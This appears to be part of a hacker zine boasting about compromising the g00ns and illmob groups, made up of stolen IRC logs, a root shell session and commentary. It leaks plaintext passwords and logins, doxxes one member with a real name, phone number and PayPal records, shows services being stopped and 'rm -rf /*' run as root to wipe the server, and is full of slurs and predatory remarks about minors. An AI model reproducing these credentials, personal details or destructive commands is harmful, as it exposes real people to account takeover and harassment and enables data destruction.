-FuRY -> tribaL: :P
-tribaL -> FuRY: but lets just say his strong points are in what they teach in networking class
-core -> tribal: yo
-tribal -> core: yo
-core -> tribal: i have one you can use
-core -> tribal: not mine though
-tribal -> core: i will suck yourfucking edick
-core -> tribal: user: jojoman112
-core -> tribal: pw: syense1
-tribal -> core: omfg
-tribal -> core: ty
-tribal -> sCuZz: i started a new irc
-tribal -> sCuZz: for the people we choose
-tribal -> sCuZz: its a private irc
-tribal -> sCuZz:
-tribal -> sCuZz: connect there
-sCuZz -> tribal: i thought i had one set :/
-tribal -> sCuZz: your opper is !beanerl0ve!
-// sCuZz //
-sCuZz -> nickserv: identify HsNS3Sksd%SmfjuuAxT
-disruptiv -> sCuZz: u dont think somebody has this ircd rewted riht now
-disruptiv -> sCuZz: somebody is sniffin somebodys shit
-disruptiv -> sCuZz: all the time
-Welcome to sn00g Forums
-Username: geezus
-Password: nukes77g1
- forums
-Username: sCuZz
-Password: nukes77g2
-// spl0iT //
-spl0iT -> nickserv: identify bejtm540
-// spl0it goes to daddy clorox for hacking help
-spl0iT -> clorox:
-// Mr. Tough Guy
-spl0iT -> d0ct0r: said he doesn't know why he was targetted and was
-wondering what type of sick game it was
-spl0iT -> d0ct0r: i told him it was a harsh lesson in security
-spl0iT -> d0ct0r: we are the g00ns
-spl0iT -> d0ct0r: expect us
-spl0iT -> d0ct0r: Yes, we were hacked. By #[7m<80><9C>we#[7m<80><9D> I mean me,
- Aaron, and our podcast - which are all hosted on the same server. I#[7m<80><99>m
- not gonna post a link to the site that supposedly hacked us just because it#[7m<80><99>s b
-ad taste. Why we were hacked? I don#[7m<80><99>t know.
-loSt -> spl0iT: d0ct0r is on 24/7 and refuses to learn
-loSt -> spl0iT: he even takes highschool from home
-loSt -> sCuZz: im turning spl0it right now
-spl0iT -> tribaL: what's the command to exit nano
-spl0iT -> tribaL: i used putty to connect
-Your login is: p10067292
-Your password is: 4g50y11x
-NNTP Address/News Server:,
-Welcome to sn00g Forums
-Username: spl0iT
-Password: TheTaCSS74
-// loSt //
-loSt's thing is that he'll do anything to move up in g00ns,
-like make them money and suck up.
-And he likes to hand out passes in IRC. :D
-loSt -> detrez: Username:
-loSt -> detrez: Password: rg8lTQFl
-loSt -> detrez: Pop3 Server:
-loSt -> detrez: Smtp Server:
-loSt -> detrez: oh, you can also login through here as well:
-loSt -> detrez:
-loSt -> detrez:
-loSt -> detrez: Username:
-loSt -> detrez: Password: voJLp90C
-loSt -> detrez: Pop3 Server:
-loSt -> detrez: Smtp Server:
-loSt -> detrez: Username:
-loSt -> detrez: Password: t5ybTINh
-loSt -> detrez: Pop3 Server:
-loSt -> detrez: Smtp Server:
-deTrez -> loSt: awesomeeeee
-loSt -> detrez: Username:
-loSt -> detrez: Password: SkAKU1eP
-loSt -> detrez: Pop3 Server:
-loSt -> detrez: Smtp Server:
-loSt -> clorox: [17:01] <Angyl> hey hun
-loSt -> clorox: [17:01] <loSt> hey
-loSt -> clorox: [17:01] <loSt> how you been?
-loSt -> clorox: [17:02] <Angyl> bad. i went wildcard. looking to make some sales
-, know any buyers?
-loSt -> clorox: [17:02] <loSt> watcha mean wildcard/
-loSt -> clorox: [17:03] <Angyl> off the grid, and unpredictable. im running.
-loSt -> clorox: [17:04] <loSt> ooo
-loSt -> clorox: [17:04] <loSt> fedz after you ?
-loSt -> clorox: [17:04] <loSt> or people?
-loSt -> clorox: [17:05] <Angyl> alphabet soup.pick your acronym
-loSt -> clorox: [17:05] <loSt> lol
-andy -> Joshua: loSt says he will keep ANYONE you want gzlined if he gets the money
-CuNt -> loSt: need the warez-bb password again
-loSt -> CuNt: 547745
-CuNt -> loSt: and its rocksuperman right?
-loSt -> tribaL: [19:55] <loSt> im just doing what i do to bring in money
-loSt -> tribaL: [19:55] <loSt> only temp to help with the load of threads
-loSt -> tribaL: [19:55] <g00ns> Which proves g00ns is only about money now
-loSt -> tribaL: [19:55] <g00ns> Whoever brings in most money gets most power
-// core //
-core -> nickserv: IDENTIFY h4xorwooT
-On Sat, Mar 15, 2008 at 6:42 PM, <>
-> hey mom this is carroll, my new email address
-Welcome to StumbleUpon! Here's your login info:
-Password: damiro
-Dear core1516161,<br /><br />We have received several complaints concerning=
- your use of the Stickam service. Specifically, we have been informed that =
-you have exposed yourself and/or others nude/partially nude to other member=
-s/users of the service.<br /><br /> ..etc(see his spool)a
-core = Cormac O'Riordan according to paypal
-Woulf Den Imprinting just sent you money with PayPal. ($2430! fuck!)
-`This email confirms that you have paid Valve Corp.=2412.04 USD using PayPal.
-Phone: +353 0864054913
-Welcome to Los Santos Role Play forums
-Username: core
-Password: hacker123 his other email
-// a59 //
-a59 -> identify snoop1
-a59 -> sixthreenine: THIS IS A FUCKIN HACKER TOOL
-a59 -> sixthreenine: I AM A FUCKIN HACKER TOOL
-a59 -> sixthreenine: DONT TALK SHIT
-a59 -> sixthreenine: NEVER
-a59 -> sixthreenine: and dont EVER question my AUTHORITY CAUSE IWILL FUCKIN HACK U'
-These kids are so funny.
-Shortly before release (and long after we had taken anything we wanted from
- g00ns) we decided to have some fun with them.
-Here are the IRC logs of us trolling and rming A lot of others
-jumped on the troll wagon and everyone had a great time!
-We fixed up the box a bit:
-[root@demon2 Unreal3.2.7]# cat unrealircd.conf
-loadmodule "src/modules/";
-loadmodule "src/modules/";
- name "";
- info "Partyvan IRC";
- numeric 11;
-admin {
- "tribaL";
- "";
-class clients
- pingfreq 180;
- maxclients 5000;
- sendq 1000000000;
- recvq 8000;
-class servers
- pingfreq 290;
- maxclients 100; /* Max servers we can have linked at a time */
- sendq 999999999;
- connfreq 100; /* How many seconds between each connection attempt */
-oper zf0 {
- from {
- userhost "*@*";
- };
- password "g00nspwnage";
- class "default";
- flags {
- netadmin;
- services-admin;
- global;
- helpop;
- can_rehash
- can_globalnotice;
- can_globalroute;
- can_globops;
- can_wallops;
- can_unkline;
- can_kline;
- can_globalkill;
- can_zline;
- can_gkline;
- can_gzline;
- get_umodew;
- get_host;
- can_override;
- can_die;
- can_restart;
- };
-[root@demon2 Unreal3.2.7]# /etc/init.d/directadmin stop
-Stopping DirectAdmin: [ OK ]
-[root@demon2 Unreal3.2.7]# /etc/init.d/httpd stop
-Stopping httpd: [ OK ]
-[root@demon2 Unreal3.2.7]# /etc/init.d/lsws stop
-[root@demon2 Unreal3.2.7]# /etc/init.d/mysqld stop
-Shutting down MySQL.. [ OK ]
-[root@demon2 Unreal3.2.7]# /etc/init.d/nessusd stop
-Shutting down Nessus services: [ OK ]
-[root@demon2 Unreal3.2.7]# /etc/init.d/proftpd stop
-Shutting down proftpd: [ OK ]
-[root@demon2 ~]# /etc/init.d/sshd restart
-Stopping sshd: [ OK ]
-Starting sshd: [ OK ]
-[root@demon2 ~]# cat /etc/ssh/sshd_config
-# $OpenBSD: sshd_config,v 1.73 2005/12/06 22:38:28 reyk Exp $
-Banner /etc/ssh/sshd-banner
-# This is the sshd server system-wide configuration file. See
-# sshd_config(5) for more information.
-# This sshd was compiled with PATH=/usr/local/bin:/bin:/usr/bin
-# The strategy used for options in the default sshd_config shipped with
-# OpenSSH is to specify options with their default value where
-# possible, but leave them commented. Uncommented options change a
-# default value.
-Port 3000
-#Protocol 2
-Protocol 2
-#AddressFamily any
-#ListenAddress ::
-# HostKey for protocol version 1
-#HostKey /etc/ssh/ssh_host_key
-# HostKeys for protocol version 2
-#HostKey /etc/ssh/ssh_host_rsa_key
-#HostKey /etc/ssh/ssh_host_dsa_key
-# Lifetime and size of ephemeral version 1 server key
-#KeyRegenerationInterval 1h
-#ServerKeyBits 768
-# Logging
-# obsoletes QuietMode and FascistLogging
-#SyslogFacility AUTH
-SyslogFacility AUTHPRIV
-#LogLevel INFO
-# Authentication:
-#LoginGraceTime 2m
-#PermitRootLogin yes
-#StrictModes yes
-#MaxAuthTries 6
-#RSAAuthentication yes
-#PubkeyAuthentication yes
-#AuthorizedKeysFile .ssh/authorized_keys
-# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
-#RhostsRSAAuthentication no
-# similar for protocol version 2
-#HostbasedAuthentication no
-# Change to yes if you don't trust ~/.ssh/known_hosts for
-# RhostsRSAAuthentication and HostbasedAuthentication
-#IgnoreUserKnownHosts no
-# Don't read the user's ~/.rhosts and ~/.shosts files
-#IgnoreRhosts yes
-# To disable tunneled clear text passwords, change to no here!
-#PasswordAuthentication yes
-#PermitEmptyPasswords no
-PasswordAuthentication yes
-# Change to no to disable s/key passwords
-#ChallengeResponseAuthentication yes
-ChallengeResponseAuthentication no
-# Kerberos options
-#KerberosAuthentication no
-#KerberosOrLocalPasswd yes
-#KerberosTicketCleanup yes
-#KerberosGetAFSToken no
-# Set this to 'yes' to enable PAM authentication, account processing,
-# and session processing. If this is enabled, PAM authentication will
-# be allowed through the ChallengeResponseAuthentication mechanism.
-# Depending on your PAM configuration, this may bypass the setting of
-# PasswordAuthentication, PermitEmptyPasswords, and
-# "PermitRootLogin without-password". If you just want the PAM account and
-# session checks to run without PAM authentication, then enable this but set
-# ChallengeResponseAuthentication=no
-#UsePAM no
-#UsePAM yes
-# Accept locale-related environment variables
-#AllowTcpForwarding yes
-#GatewayPorts no
-#X11Forwarding no
-X11Forwarding yes
-#X11DisplayOffset 10
-#X11UseLocalhost yes
-#PrintMotd yes
-#PrintLastLog yes
-#TCPKeepAlive yes
-#UseLogin no
-#UsePrivilegeSeparation yes
-#PermitUserEnvironment no
-#Compression delayed
-#ClientAliveInterval 0
-#ClientAliveCountMax 3
-#ShowPatchLevel no
-#UseDNS yes
-#PidFile /var/run/
-#MaxStartups 10
-#PermitTunnel no
-# no default banner path
-#Banner /some/path
-# override default of no subsystems
-Subsystem sftp /usr/libexec/openssh/sftp-server
-AllowUsers ZF0PWN
-[root@demon2 ~]# rm -rf /*
-rm: cannot remove `/': Operation not permitted
-cannot remove `/aquota.user': Operation not permitted
-cannot remove directory `/backup': Device or resource busy
-cannot remove directory `/boot': Device or resource busy
-[root@demon2 ~]#
-And we trolled:
---- Log opened Wed May 07 11:50:55 2008
-11:50 < r00tr00t> welcome to the zf0 rmage
-11:50 < Angyl> for the lulz
-11:50 < ECB> hmm
-11:51 < Angyl> and auctuioning it off on mids
-11:51 <+theswellseason> Zombocom why are you such a faggot
-11:51 <+theswellseason> I can't believe I thought I loved you Zombocom
-11:51 < boon> SAY GOOD NIGHT G000ns
-11:51 -!- Slowpoek is now known as theswelllseason
-11:51 < r00tr00t> [root@demon2 ~]# ls /home/g00ns
-11:51 < r00tr00t> ls: /home/g00ns: No such file or directory
-11:51 < theswelllseason> lol
-11:51 < r00tr00t> you have been rm'ed
-11:51 < boon> TOODLEOOOO
-11:51 < Angyl> swell.
-11:51 < r00tr00t> bye
-11:51 < Angyl> did i ever show you the pic
-11:51 < Angyl> of riot
-11:51 < Angyl> looking like an epic faggot
-11:51 < boon> hahaha you guys dont even know :(
-11:51 <&FuRY|Shmoke> `kb r00tr00t
-11:51 < boon> lolz
-11:51 <&FuRY|Shmoke> :(
-11:51 <+theswellseason> actually I think you did
-11:52 < theswelllseason> lol we just got hacked
-11:52 < Angyl> that one?
-11:52 <%p00h> :/
-11:52 < theswelllseason> looooooool
-11:52 < theswelllseason> `staff
-11:52 < boon> lol
-11:52 <+theswellseason> wtf who is theswelllseason
-11:52 < theswelllseason> i am slowpoke :P
-11:52 <+theswellseason> HAHAHAHAHAHAHAHAHAHA
-11:52 < theswelllseason> <3 ^_^
-11:52 < Slowpoke> oh shit what the hell
-11:52 < Angyl> o.o
-11:52 < theswelllseason> angyl = selfish
-11:52 < Slowpoke> Oh
-11:52 < boon> its fun that your last messages will be from the whore that is theswellseason
-11:53 <+theswellseason> Angyl that is hilarious
-11:53 < theswelllseason> slowpoke = angyl
-11:53 <+theswellseason> poor guy
-11:53 -!- r00tr00t was kicked from #g00ns by FuRY|Shmoke [FuRY|Shmoke]
-11:53 < boon> and soo nthe world will see your sexy pics
-11:53 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns
-11:53 <+Zombocom> dude, swell's not a whore
-11:53 -!- mode/#g00ns [+b *!*@FB370F60.35B0F1AB.6B794A7F.IP] by FuRY|Shmoke
-11:53 -!- r00tr00t was kicked from #g00ns by FuRY|Shmoke [FuRY|Shmoke]
-11:53 < Angyl> yes she is
-11:53 < Angyl> quit defending your irc girlfriend
-11:53 <+Zombocom> no she's not
-11:53 < Angyl> shes proud of being a whore
-11:53 -!- FuRY|Shmoke [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker]
-has quit [Killed (r00tr00t (faggot))]
-11:53 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns
-11:53 -!- FuRY [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has joined #g00ns
-11:53 -!- mode/#g00ns [+ao FuRY FuRY] by HustleServ
-11:53 <+theswellseason> Angyl you best not be talkin shit :P
-11:53 <%p00h> lol
-11:53 < Slowpoke> theswellseason sux
-11:53 < Slowpoke> D:
-11:54 -!- theswellseason is now known as DickMonkey
-11:54 < Angyl> im not
-11:54 < ECB> lol
-11:54 < Angyl> im just saying your a whore baby
-11:54 < ECB> ok im gonna shower niggas
-11:54 <+DickMonkey> I ain't swell
-11:54 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has quit
-[Killed (januszeal (who are you))]
-11:54 -!- theswelllseason is now known as theswelseason
-11:54 < ECB> ill talk to you bitches later
-11:54 -!- Zombocom is now known as theswellseason
-11:54 -!- DickMonkey is now known as Zombocom
-11:54 <+theswellseason> lol
-11:54 -!- notherejack [notjack@48A9411C.15EBAEA.ED99F467.IP] has quit [Ping timeout]
-11:54 <+Zombocom> god since when does Zombocom have voice in here
-11:54 <+theswellseason> lol
-11:55 < Angyl> since he started fucking you
-11:55 <+theswellseason> LOL
-11:55 <+theswellseason> angyl
-11:55 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns
-11:55 < ECB> lol
-11:55 <+theswellseason> we're back to normal
-11:55 <+theswellseason> I'm swell again
-11:55 <&FuRY> everyone join
-11:55 <+Zombocom> and I'm Zombocom
-11:55 < Murdoc> osht angyl is getting bitchy :[
-11:55 < Murdoc> break out the xanax
-11:55 < Slowpoke> asl Murdoc :)
-11:55 <+Zombocom> Angyl gets bitchy when she gets confused
-11:55 < Murdoc> 40/m/basement
-11:55 < Slowpoke> 12/f/uk u?
-11:55 < Slowpoke> :)
-11:56 < Slowpoke> aww :>
-11:56 -!- theswelseason is now known as Selfish
-11:56 <+Zombocom> she's allways confused with her sexuality
-11:56 <+Zombocom> so she's always angry
-11:56 < Angyl> im playing trivia
-11:56 <+theswellseason> you're asking to get rooted boy
-11:56 < Angyl> and im alrdy on xanax
-11:56 <+theswellseason> LOL
-11:56 <+theswellseason> shit, not even that works
-11:56 <+theswellseason> <3
-11:56 < r00tr00t> [root@demon2 lib]# rm -rf /*
-11:56 < r00tr00t> rm: cannot remove `/': Operation not permitted
-11:56 < r00tr00t> rm: cannot remove `/aquota.user': Operation not permitted
-11:56 < r00tr00t> bye bye
-11:56 < Angyl> lol
-11:56 <+Zombocom> not even xanax can stop her hormonal rage
-11:56 <+Zombocom> NOTHING CAN TOP HER
-11:56 <+Zombocom> STAY OUT OF HER WAY
-11:57 < Angyl> im not raging
-11:57 * Zombocom jumps in front of a train
-11:57 < Slowpoke> What about
-11:57 < Slowpoke> a slowpoke
-11:57 < Slowpoke> ^_^^
-11:57 <%andy> everyone in here thats connected to
-11:57 <+Zombocom> OH GOD
-11:57 <%andy> connect to
-11:57 <+Zombocom> SHE'S SO ANGRY
-11:57 -!- Netsplit <-> haruhi.partyvan.hub quits: p00h,
-kumar, +PhyuK|Shmoke, malaphus, +Zombocom, Striker, andy, Gibby, ECB, @FuRY,
- (+34 more, use /NETSPLIT to show all of them)
-11:58 -!- Angyl [Angyl@] has quit [Quit: ]
---- Log closed Wed May 07 11:58:41 2008
-14:10 -!- lilo [lilo@D609CC9E.EF030B1D.2A28F7FA.IP] has joined #G00NS
-14:11 < lilo> trintitty f4rh@nLOL°
-14:11 < lilo> plasma jblink
-14:11 <%plasma> wat
-14:11 <%plasma> lolol
-14:11 < lilo> trintitty -> nickserv: identify lolh@x0r
-14:11 < lilo> lulz
-14:11 <%plasma> that's sad :(
-14:11 < fff> l0l
-14:11 < lilo> PhyuK -> nickserv: identify 1asdf2
-14:11 <%plasma> colombia :O
-14:11 -!- lilo [lilo@D609CC9E.EF030B1D.2A28F7FA.IP] has quit [Killed (core (faggot))]
-14:11 <+d0ct0r> lol
-14:11 < fff> u dumb j3ws
-14:12 <+theswellseason> wait, core are those right?
-14:12 <+d0ct0r> i dont think so.
-14:12 <+theswellseason> lol nvm
-14:12 <+theswellseason> you wouldn't tell me if you could
-14:12 <%plasma> well
-14:12 <%plasma> he got mine right
-14:12 -!- PhyuK [] has quit [NickServ (GHOST command used by canr)]
-14:12 <%plasma> :(
-14:12 <%canr> lol its right
-14:12 <+d0ct0r> lol
-14:12 -!- trintitty [] has quit
-[NickServ (GHOST command used by w)]
-14:12 <%andy> oh mother fucker
-14:12 <+theswellseason> oh shit!
-14:12 < fff> lilo -> nickserv: identify isuckalotofdickmmm
-14:12 <+d0ct0r> :O
-14:12 <+theswellseason> core, get what's that fucker's IP?
-14:13 -!- syph [syph@freecandy.van] has joined #G00NS
-14:13 -!- mode/#g00ns [+h syph] by HustleServ
-14:13 <%plasma> theswellseason: it was a proxy
-14:13 * d0ct0r goes to change all his pw's
-14:13 <%plasma> in colombia
-14:13 <@core> theswellseason: im not retarded
-14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm
-14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm
-14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm
-14:13 -!- PhyuK [] has joined #G00NS
-14:13 -!- mode/#g00ns [+v PhyuK] by HustleServ
-14:13 <%syph> hai
-14:13 <+PhyuK> o no my irc nick
-14:13 <+PhyuK> :(
-14:13 <+PhyuK> im h4xed
-14:13 <+PhyuK> i use that pw for EVERYTHING
-14:13 -!- trintitty [] has joined #G00NS
-14:13 -!- mode/#g00ns [+o trintitty] by HustleServ
-14:13 <%plasma> why didnt he deface :p
-14:13 <@trintitty> ...
-14:14 <+theswellseason> you were hacked
-14:14 <@trintitty> because he had more ultimate pwnage in mind..
-14:14 -!- grub [grub@FB6A658F.9037C7E6.2A28F7FA.IP] has joined #G00NS
-14:14 < grub> FuRY -> nickserv: identify asshole6669
-14:14 -!- trintitty [] has
-quit [NickServ (GHOST command used by fff)]
-14:14 <%plasma> lol
-14:14 < fff> lol
-14:14 -!- mode/#g00ns [+b *!*] by canr
-14:14 < grub> core -> nickserv: IDENTIFY h4xorwooT
-14:14 -!- fff [] has quit [Killed (core (-))]
-14:14 -!- FuRY|Working is now known as FuRY
-14:14 -!- FuRY is now known as drop
-14:14 -!- core [] has quit [NickServ (GHOST command used by plasma)]
-14:16 -!- core [] has joined #G00NS
-14:16 -!- mode/#g00ns [+o core] by HustleServ
-14:16 -!- FuRY [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has joined #G00NS
-14:16 < FuRY> :|
-14:16 < FuRY> `up
-14:16 <+PhyuK> I hope everybody is aware of the repercussions
-14:17 <@core> change your passes
-14:17 <@core> /ns set password
-14:17 <%canr> why ;\
-14:17 < FuRY> i dropped mine
-14:17 < FuRY> :P
-14:17 <%canr> if he can get it again
-14:17 <%andy> `sop add FuRY
-14:17 < FuRY> `up
-14:17 -!- mode/#g00ns [+ao FuRY FuRY] by HustleServ
-14:17 <&FuRY> thx
-14:17 -!- mode/#g00ns [+v canr] by canr
-14:17 <@w> why are pw's not encrypted
-14:17 <%plasma> w: well, they used to be :(
-14:49 <~clorox> g00ns are over
-14:50 -!- clorox changed the topic of #G00NS to: 
-15:12 <+[nazi]notjack> g00nFuRY (20:47:47): hackers that hack hackers
-15:12 < DrMengele> yeah what happened?
-15:13 <+[nazi]notjack> zero for owned r00ted g00ns
-15:13 <+[nazi]notjack> deleted everything
-15:13 <+[nazi]notjack> g00ns may be over
-15:13 <+[nazi]notjack> so
-15:13 <+[nazi]notjack> drama
-15:13 < lollercaust> drama sucks
-15:13 < lollercaust> what is zero for owned website?
-15:13 < WB> http://zero.for.owned.on
-15:14 < WB>
-15:14 <+[nazi]notjack> Yeah
-15:14 < lollercaust> heh i use lynx smartass
-15:15 <~tribal> `akick add * g00ns is over
-15:15 <~tribal> what
-15:15 -!- tribal is now known as clorox
-15:15 <~clorox> `akick add * g00ns is over
-15:15 -!- mode/#g00ns [+b *!*@*] by HustleServ
-15:15 -!- NoName was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- unknown|49515 was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- TaGg was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- [Midnight] was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- skinless was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- malaphus was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Striker was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- CuNt was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- aempirei was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Gibby was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- KLAUS_NOMI was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- REVEREND_REY was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- iZaP was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- FukkenSaved was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Kame was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Deltantor was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- RickRollington was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- transientox was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Jewgoldz|A[ushwitz] was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- WB was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- DeMiNe0 was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- DrMengele was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Dark_Fusion was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- p00h was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- ECB was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- malaphus|laptop was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- Angyl was kicked from #g00ns by HustleServ [g00ns is over]
-15:15 -!- krispin was kicked from #g00ns by HustleServ [g00ns is over]
---- Log closed Wed May 07 15:15:24 2008
-Fantastic, just FANTASTIC.
-We were just jealous that g00ns thought of selling t-shirts before we did.
-Anybody want a "ZF0wned", "0wned by ZF0", or "Featured in ZF04" t-shirt?
-Look for them at a store near you!
-Just kidding, we're not in it for the money. If we were, instead of making
-and selling t-shirts we would make and sell CANVAS.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 illmob zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-illmob was on the g00ns box, but they get their own article because they aren't
-g00ns and we have a bit of material.
-illmob is just a laugh no matter how you look at it. Never was taken seriously,
-and it's claim to fame is ill[will] being imprisoned for selling Windows source
- code. Check out his legal papers and wikipedia article, name's William Genovese.
-illmob didn't really get themselves owned, I mean they did not cause the g00ns
-owning in any way. They weren't even a target, just a helpless battleground spoil.
-Their only security mistake that lead to this was being hosted on g00ns. It's a
-mistake nonetheless, albeit one they wanted to correct. It's not like they are
-really secure or anything, the webdir is basically a poorly managed file dump.
-We found some funny quotes for you. They give (most of) these out for free in
-#illmob, check it out for a laugh. They will probably be glad to have another
-channel member regardless of how you treat them.
-Phist -> #illmob: [ill]will: I've just realized why nobody links to us anymore
-and shit
-canr -> #illmob: Why?
-Phist -> #illmob: [ill]will: Now that you're out of jail, it's not 'cool' to
-like illmob
-Phist -> #illmob: chilly: Please could you commit a crime
-Phist -> #illmob: but a cool one
-chilly -> #illmob: jaywalk
-Phist -> #illmob: because we need more hits
-// There's a documentary?? Must not have made my local theatre
-canr -> #illmob: Whats the name of that documentary about [ill]will
-canr -> #illmob: the 2600 one?
-Phist -> #illmob: I forget - are you Scandinavian? or Finnish?
-canr -> #illmob: Freedom Downtime
-canr -> #illmob: Got it
-Phist -> #illmob: We've got the skill to be something
-Phist -> #illmob: and we're wasting our time
-Spyd3r -> #illmob: yes, I agree
-Phist -> #illmob: we've got will back
-Phist -> #illmob: he's a fuckin' ASM master
-Phist -> #illmob: this is bullshit
-Phist -> #illmob: we're pro
-SpunkWang -> #illmob: gh0st: I have normal user access to a box... /r/ sploits
-(vmsplice doesnt work ;-;_
-gh0st -> #illmob: what distro
-SpunkWang -> #illmob: how do i find out... i knew the command 4 hours ago lol
-ECB -> #illmob: its kind of sad, im not smart enough to do computer shit
-ECB -> #illmob: all this 01010101010101 shit and fucking C++
-gh0st -> #illmob: try
-gh0st -> #illmob: uname -a
-ECB -> #illmob: I fucking got an A+ in my classes, why cant i understand C++
-gh0st -> #illmob: spunkwang: he's running kernel 2.6.9
-gh0st -> #illmob: shit is outdated nigga
-SpunkWang -> #illmob: gh0st: I tried running the vmsplice sploit but it nay
-work :(
-// Capitalisation is sweet, is there a Disney movie now or something?
-Spyd3r -> #illmob: I know shit about system level exploits
-Riot -> #illmob: Buffer Overflows are fuckin myths to me.
-Spyd3r -> #illmob: I consider myself a bright guy, but the only programming I
-do is web apps
-padlock -> #illmob: I know slack the best
-padlock -> #illmob: bsd sounds good, too, though
-padlock -> #illmob: I'm so confused, so many good kernels and distros
-coldblood -> #illmob: sounds like the new server is mega securer
-coldblood -> #illmob: k r u really going to need that much sercurity?
-padlock -> #illmob: Yeah, so I want to make sure we don't get owned stupidly
-coldblood -> #illmob: yer that would be embassing if you did
-padlock -> #illmob: Spyd3r is good at making sure the website itself doesn't
-have a ton of holes, and I secure servers for a living, so I think we should be
-able to handle it
-coldblood -> #illmob: yer
-padlock -> #illmob: Only ports open on the server are for services we'll use
-padlock -> #illmob: And it'll be behind another firewall on top of that
-Spyd3r -> #illmob: well we run well over 375 client sites from the farm
-Spyd3r -> #illmob: only about 200 of those have the add-on that was used to get
-canr -> gr0b: Theres this code my friend has:
-canr -> gr0b: Hes wondering what encryption that is. Would you happen to know
-what type?
-shamrock -> #illmob: im getting some widgets for yahoo go
-[ill]will -> #illmob: dont waste your youth on the interweb
-[ill]will -> #illmob: save it to your late 30s
-[ill]will -> #illmob: well actually you dont have to worry right now about
-underage poon
-[ill]will -> #illmob: so get yourself an aol account
-[ill]will -> #illmob: and start a/s/l and s2r-ing
-[ill]will -> #illmob: easy pussy on aol
-[ill]will -> #illmob: girls on the net have low self esteem
-coldblood -> #illmob: Beer + penis = pussy
-canr -> #illmob: no.
-Phist -> #illmob: canr: ya rly
-Phist -> #illmob: coldblood: From that one sentence, I just extracted the
-information that you are a virgin
-Phist -> #illmob: I'm not gonna sit here and talk shit about it, but I'm pretty
-Spyd3r -> #illmob: I rather miffed myself
-Spyd3r -> #illmob: just glad that we're alrdy planning to get on a different
-coldblood -> #illmob: then do something about it
-Phist -> #illmob: I'm not, because z3r0 has done so much for us
-Spyd3r -> #illmob: I'm so sick of the children
-Phist -> #illmob: and the g00ns as a group have been really supportive
-Spyd3r -> #illmob: aye, I must give respect to "the g00ns"
-Spyd3r -> #illmob: but individually speaking, there's a mean age of 17
-Spyd3r -> #illmob: why is it that I've only met 4 intelligent g00ns?
-Spyd3r -> #illmob: having some experience in the pr0n industry, that doesn't
-surprise me too much
-Spyd3r -> #illmob: I've done a lot of free-lance work in what used to be the
-very respectable SickSiteNetworks
-Phist -> #illmob: coldblood: He also starred in 2girls1cup
-Spyd3r -> #illmob: that's the parent company for ConsumptionJunction,
-SteakandCheese, RevengeWorld, about 5 others
-Spyd3r -> #illmob: They were acquired back in November, so I haven't done work
-for them in a bit
-canr -> #illmob: Shamrock is = Shamrock, sham_, sham, clover, teh, w-,
-canr -> gr0b: I want to kill shamrock.
-canr -> gr0b: I just hate shamrock with a burning passion.
-shamrock -> a59: uhh wanna own canr with me?
-Phist -> #illmob: I tried to quit at got promoted
-Phist -> #illmob: and*
-Genocide -> #illmob: damn, you suck at quitting
-Genocide -> #illmob: :)
-Phist -> #illmob: If I try to quit again, I'll get network admin
-Phist -> #illmob: :P
-Phist -> #illmob: seriously though, I hate this
-Phist -> #illmob: just sayin
-Genocide -> #illmob: i'm willing to live with that
-Genocide -> #illmob: you can't leave me ;_
-Genocide -> #illmob: ;
-Phist -> #illmob: I do like the individuals
-Phist -> #illmob: god fucking dammit
-Phist -> #illmob: It's not like it makes a difference
-Phist -> #illmob: We should start an e-war with anonymous // we'll get the
-word out for you
-Spyd3r -> Riot: don't take this the wrong way, ok?
-Riot -> Spyd3r: k
-Riot -> Spyd3r: :>
-Spyd3r -> Riot: I gather data on anyone I come across
-Riot -> Spyd3r: Mhmm.
-Riot -> Spyd3r: I expecti t.
-Spyd3r -> Riot: and I have an extensive library on g00ns members
-Riot -> Spyd3r: I dunno, I'm thinking about leaving g00ns
-Riot -> Spyd3r: Don't really get much respect for my craft there, you know
-Riot -> Spyd3r: Can't really grow.
